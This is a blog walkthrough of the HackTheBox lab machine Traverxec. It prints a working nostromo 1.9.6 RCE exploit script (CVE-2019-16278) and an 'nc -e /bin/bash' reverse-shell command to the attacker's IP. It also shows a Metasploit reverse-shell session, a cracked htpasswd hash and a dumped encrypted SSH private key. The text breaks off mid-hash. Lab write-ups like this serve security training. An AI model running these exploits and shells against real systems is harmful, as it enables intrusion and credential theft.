HackTheBox - Traverxec 🗜️📂

❯ PΛYΛƧ0

11-04-2020

GTFObins, cve, lfi, linux, rce, retired, ssh, traversal

HackTheBox-Traverxec

Quick Summary

→ Traverxec is another beginner friendly machine that runs on Linux. The machine has two open ports which is port 22 & 80 that basically running a SSH and HTTP Service. There is nothing to use on the website when I tried to look something but the website’s has middleware service Nostromo 1.9.6 has a directory traversal bypass that causes RCE or Remote Code Execution and enter into www-data.
After entering the target machine it seems that user directory give us Permission's denied but when I was look at the configuration file we can enter at /public_www/ based on the $HOMEDIRS. The directory contains SSH Key which I use to enter for user david.
The Privilege Escalation part was tricky. As the user has can run journalctl that has root privileges and to get the root is to change the size of our terminal shell into small so I can execute !/bin/bash command and get the administrator shell.

Penetration Testing Methodologies

Network Scanning

→ Nmap scan

→ discover open ports and what services are running
Enumeration

→ Browsing the HTTP Service

→ Search about Nostromo 1.9.6
Post - Exploitation

→ Enumerate machine with Nostromo 1.9.6 Exploit

→ Metasploit to gain direct access

→ run LinEnum or Scripted Local Linux Enumeration & Privilege Escalation Checks to look for interesting inside the machine

→ Decrypt the password hash that appear on the script.

→ Looking at configuration file we allowed to enter /public_www/
Exploitation

→ copy the backup-ssh-key at the /tmp/ directory

→ enumerate david files we see SSH Key

→ decrypt SSH Key with ssh2john and decrypt the hash with John

→ Login with SSH Key and use the passphrase we decrypt and get the user.txt
Privilege Escalation

→ Abuse what the user is allowed to run which is the journalctl

→ with GTFObins I see that i can execute a shell with journalctl

→ change the terminal into small size and execute !/bin/bash and become root

→ Finally get the root.txt

Network Scanning

Walkthrough

→ I always begin at NMAP to look on the services what is running. I always use

-sV ⇒ Probe open ports to determine service/version info
-sC ⇒ equivalent to —script=default
-T 0-5 ⇒ Set timing template - higher is faster (less accurate)
-A- ⇒ Agressive scan
-oN ⇒ to save our scan results to a text file

# bash

nmap -sV -sC -A -T4 10.10.10.165 -oN nmap-Traverxec

# bash

root in htb/boxes/Traverxec 
❯ nmap -sV -sC -A -T4 10.10.10.165 -oN nmap-Traverxec
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 05:53 PST
Nmap scan report for 10.10.10.165
Host is up (0.26s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   258.62 ms 10.10.14.1
2   264.54 ms 10.10.10.165

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.77 seconds

root in htb/boxes/Traverxec took 38s 
❯

Nmap results

So there’s port open.

22 ⇒ which basically use for SSH Connections
80 ⇒ which basically running a website also there’s running a service which is Nostromo at version 1.9.6

Enumeration

Traverxec Website

Since there’s Web Service running, I will look at it and try what should I got so:

HackTheBox-Traverxec

So we have a hint from the front page of the website. I got a user named – David White i will take note this because there’s a possibly that guy we will be our user.

also the website’s a has a contact form but not much interesting.

HackTheBox-Traverxec

other than there’s no more stuffs on the web’ so I’ll gonna move on the next phase.

In my nmap scan results’ the HTTP Service has running Nostromo 1.9.6 i try to use searchsploit to look if there’s a vulnerability in that service and yes it has.

Nostromo 1.9.6

# bash

root in htb/boxes/Traverxec 
❯ searchsploit nostromo
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                    |  Path
                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                                                                              | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                                                                                                            | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                                              | exploits/linux/remote/35466.sh
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

root in htb/boxes/Traverxec 
❯

It was a directory traversal attack which is lead to Remote Command Execution. I try to look on the exploit with searchsploit again with -x

# bash

root in htb/boxes/Traverxec 
❯ searchsploit -x nostromo 1.9.6 - Remote Code Execution                                                                                                            | exploits/multiple/remote/47837.py

and the code exploit:

# python 3

# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278

# cve2019_16278.py

#!/usr/bin/env python

import sys
import socket

art = """

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload)
    receive = connect(soc)
    print(receive)

if __name__ == "__main__":

    print(art)
    
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]

        cve(target, port, cmd)
   
    except IndexError:
        print(help_menu)

root in htb/boxes/Traverxec 
❯

Post - Exploitation

Enumerate Traverxec machine

I search about the Nostromo 1.9.6 vulnerabilities, using the exploit that I have, i can execute a command like whoami and hostname so:

# bash

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ python cve2019_16278.py 10.10.10.165 80 whoami


                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    




HTTP/1.1 200 OK
Date: Fri, 9 Apr 2020 22:18:22 GMT
Server: nostromo 1.9.6
Connection: close


www-data


root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯

as you can see It give me results – www-data. next I try the hostname:

# python 3

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ python cve2019_16278.py 10.10.10.165 80 hostname


                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    




HTTP/1.1 200 OK
Date: Fri, 9 Apr 2020 22:19:45 GMT
Server: nostromo 1.9.6
Connection: close


traverxec


root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯

and It gives me result hostname – traverxec. Now since I can execute a command i’ll try to use netcat if i can gain reverse shell, but it’s not working it gives me an error Cmd line: wrong

# python 3

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ python cve2019_16278.py 10.10.10.165 80 nc 10.10.15.21 1339 -e /bin/bash


                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    




HTTP/1.1 200 OK
Date: Fri, 10 Apr 2020 22:21:52 GMT
Server: nostromo 1.9.6
Connection: close


Cmd line: wrong


root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯

Use Metasploit to Direct Access

So I try Rapi7 - MetaSploit to direct access in the target machine and obtain remote shell, I search about Nostromo exploit and it is very exact what I needed so :

# bash

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ msfconsole
                                                  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


       =[ metasploit v5.0.80-dev                          ]
+ -- --=[ 1983 exploits - 1085 auxiliary - 339 post       ]
+ -- --=[ 563 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your module, why not try the reload command

msf5 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


msf5 >

Now i will use it but first we need to see the options so I can see what is the requirements :

# bash

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf5 exploit(multi/http/nostromo_code_exec) >

Get in into the machine

So RHOSTS or the target host which is the Traverxec and LHOST or the attackers IP (me) that I will input and do the exploitation.

# bash

msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.15.21
LHOST => 10.10.15.21
msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.15.21:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.21:4444 -> 10.10.10.165:51530) at 2020-04-11 06:45:16 +0800

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

so I have now direct access to machine. but I need to upgrade it into interactive shell with python :

# bash

python -c 'import pty; pty.spawn("/bin/bash");'

Finally I have now the www-data :

# bash

www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$

WWW-DATA

Now that i’m in, the enumeration start again’ to do this quickly I use LinEnum.sh this script is very useful if the attacker is trying to look what they need to do exploit exploit or use some stuffs for privilege escalation so from my Kali Linux machine I’ll transfer LinEnum.sh in /tmp folder and run it.

# bash

www-data@traverxec:/tmp$ ls
ls
systemd-private-587b5e2d5cd0457081bf5a03c6d18e2a-systemd-timesyncd.service-TqSk1v
vmware-root
vmware-root_557-4282236562
www-data@traverxec:/tmp$ wget http://10.10.15.21/LinEnum.sh
wget http://10.10.15.21/LinEnum.sh
--2020-04-10 19:02:22--  http://10.10.15.21/LinEnum.sh
Connecting to 10.10.15.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh          100%[===================>]  45.54K  59.0KB/s    in 0.8s    

2020-04-10 19:02:24 (59.0 KB/s) - 'LinEnum.sh' saved [46631/46631]

www-data@traverxec:/tmp$ ls
ls
LinEnum.sh
linux-exploit-suggester.sh
systemd-private-587b5e2d5cd0457081bf5a03c6d18e2a-systemd-timesyncd.service-TqSk1v
vmware-root
vmware-root_557-4282236562
www-data@traverxec:/tmp$

And ofcourse running this it will give us a basic information about the target :

# bash

www-data@traverxec:/tmp$ bash LinEnum.sh
bash LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Fri Apr 10 19:03:30 EDT 2020


### SYSTEM ##############################################
[-] Kernel information:
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.19.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20)


[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"


[-] Hostname:
traverxec


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

and there’s a previously login and that will be our user named – david

# bash

[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Sat Nov 16 16:07:31 -0500 2019
david            pts/4    10.10.15.162     Fri Apr 09 18:59:23 -0400 2020

I can also see what’s the user password in /etc/passwd based on david:x:1000:1000:david,,,:/home/david:/bin/bash :

# bash

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
david:x:1000:1000:david,,,:/home/david:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

but the script is doing that for me ;)

# bash

[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Now that I have a password hash for david I use john decrypt it with rockyou.txt wordlists. and I got the password Nowonly4me

# bash

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ john david --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me       (david)
1g 0:00:05:49 DONE (2020-04-11 07:12) 0.002864g/s 30305p/s 30305c/s 30305C/s Noyoudo..Nous4=5
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root in htb/boxes/Traverxec via 🐍 v2.7.17 took 5m49s 
❯

I try to login into SSH with I password I got but it seems is not the right password. It just a rabbit hole. so moved on try to look again with other stuffs. so I’ll go at home directory it doesn’t allow me to look into files.

# bash

www-data@traverxec:/usr/bin$ cd /home
cd /home
www-data@traverxec:/home$ ls
ls
david
www-data@traverxec:/home$ cd david
cd david
www-data@traverxec:/home/david$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@traverxec:/home/david$

So I’ll try to look more on the machine folder’ I go first at /var/ directory and I see a nostromo which is very interesting.

# bash

www-data@traverxec:/home/david$ cd /var
cd /var
www-data@traverxec:/var$ ls
ls
backups  cache  lib  local  lock  log  mail  nostromo  opt  run  spool  tmp
www-data@traverxec:/var$

Looking at the nostromo folder there was a configuration file which is the nhttpd.conf and this will give me a big hint what to do next.

# bash

www-data@traverxec:/var/nostromo$ ls
ls
conf  htdocs  icons  logs
www-data@traverxec:/var/nostromo$ file conf
file conf
conf: directory
www-data@traverxec:/var/nostromo$ cd conf
cd conf
www-data@traverxec:/var/nostromo/conf$ ls
ls
mimes  nhttpd.conf
www-data@traverxec:/var/nostromo/conf$

The nhttpd.conf has given instructions :

# bash

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www
www-data@traverxec:/var/nostromo/conf$ 


# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www


www-data@traverxec:/var/nostromo/conf$

Exploitation

HOME DIRECTORY

based on the line $HOMEDIRS we can access /public_www at /home/david directory even it is given us permission’s denied so i go back to the david’s directory and enter to public_www folder

# bash

www-data@traverxec:/var/nostromo/conf$ cd /home/david
cd /home/david
www-data@traverxec:/home/david$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@traverxec:/home/david$ 


www-data@traverxec:/home/david$ cd public_www
cd public_www
www-data@traverxec:/home/david/public_www$ ls
ls
index.html  protected-file-area
www-data@traverxec:/home/david/public_www$

well there was a protected-file-area and I think it contains data hoping that this one is password but it is a backup-ssh-key not bad ! so :

# bash

www-data@traverxec:/home/david/public_www$ cd protected-file-area
cd protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
ls
backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$

Well since I dont have permission on that folder to do write I unzip and copy the .tgz file into /tmp directory so :

# bash

www-data@traverxec:/home/david/public_www/protected-file-area$ tar zxvf backup-ssh-identity-files.tgz -C /tmp
<rea$ tar zxvf backup-ssh-identity-files.tgz -C /tmp           
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
www-data@traverxec:/home/david/public_www/protected-file-area$

I see that there was ssh-key files which I can use to get in with user david.

# bash

www-data@traverxec:/home/david/public_www/protected-file-area$ cd /tmp
cd /tmp
www-data@traverxec:/tmp$ ls
ls
home
systemd-private-52315d40046b4b63a760a2af02bc88ef-systemd-timesyncd.service-3xyrna
update
vmware-root
vmware-root_556-2966037836
www-data@traverxec:/tmp$ cd home
cd home
www-data@traverxec:/tmp/home$ ls
ls
david
www-data@traverxec:/tmp/home$ cd david
cd david
www-data@traverxec:/tmp/home/david$ ls -la
ls -la
total 12
drwxr-xr-x 3 www-data www-data 4096 Apr 10 19:37 .
drwxr-xr-x 3 www-data www-data 4096 Apr 10 19:37 ..
drwx------ 2 www-data www-data 4096 Oct 25 17:02 .ssh


www-data@traverxec:/tmp/home/david$ cd .ssh
cd .ssh
www-data@traverxec:/tmp/home/david/.ssh$ ls
ls
authorized_keys  id_rsa  id_rsa.pub

Now what i need is to copy the id_rsa into my machine.

# bash

www-data@traverxec:/tmp/home/david/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----
www-data@traverxec:/tmp/home/david/.ssh$

Decrypt SSH Key with ssh2john

I try to login in SSH with id_rsa I thought i can get in into machine but it needs a passphrase’ to get that i decrypt id_rsa with ssh2john to get the hash.

# bash

root in htb/boxes/Traverxec via 🐍 v2.7.17 took 3s 
❯ python ssh2john.py id_rsa > id_rsa-hash

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ ls
cve2019_16278.py  david  id_rsa  id_rsa-hash  LinEnum.sh  nmap-Traverxec  ssh2john.py

root in htb/boxes/Traverxec via 🐍 v2.7.17 
❯ cat id_rsa-hash 
id_rsa:$sshng$1$16$477EEFFBA56F9D283D349033D5D08C4F$1200$b1ec9e1ff7de1b5f5395468c76f1d92bfdaa7f2f29c3076bf6c83be71e213e9249f186ae856a2b08de0b3c957ec1f086b6e8813df672f993e494b90e9de220828aee2e45465b8938eb9d69c1e9199e3b13f0830cde39dd2cd491923c424d7dd62b35bd5453ee8d24199c733d261a3a27c3bc2d3ce5face868cfa45c63a3602bda73f08e87dd41e8cf05e3bb917c0315444952972c02da4701b5da248f4b1725fc22143c7eb4ce38bb81326b92130873f4a563c369222c12f2292fac513f7f57b1c75475b8ed8fc454582b1172aed0e3fcac5b5850b43eee4ee77dbedf1c880a27fe906197baf6bd005c43adbf8e3321c63538c1abc90a79095ced7021cbc92ffd1ac441d1dd13b65a98d8b5e4fb59ee60fcb26498729e013b6cff63b29fa179c75346a56a4e73fbcc8f06c8a4d5f8a3600349bb51640d4be260aaf490f580e3648c05940f23c493fd1ecb965974f464dea999865cfeb36408497697fa096da241de33ffd465b3a3fab925703a8e3cab77dc590cde5b5f613683375c08f779a8ec70ce76ba8ecda431d0b121135512b9ef486048052d2cfce9d7a479c94e332b92a82b3d609e2c07f4c443d3824b6a8b543620c26a856f4b914b38f2cfb3ef6780865f276847e09fe7db426e4c319ff1e810aec52356005aa7ba3e1100b8dd9fa8b6ee07ac464c719d2319e439905ccaeb201bae2c9ea01e08ebb9a0a9761e47b841c47d416a9db2686c903735ebf9e137f3780b51f2b5491e50aea398e6bba862b6a1ac8f21c527f852158b5b3b90a6651d21316975cd543709b3618de2301406f3812cf325d2986c60fdb727cadf3dd17245618150e010c1510791ea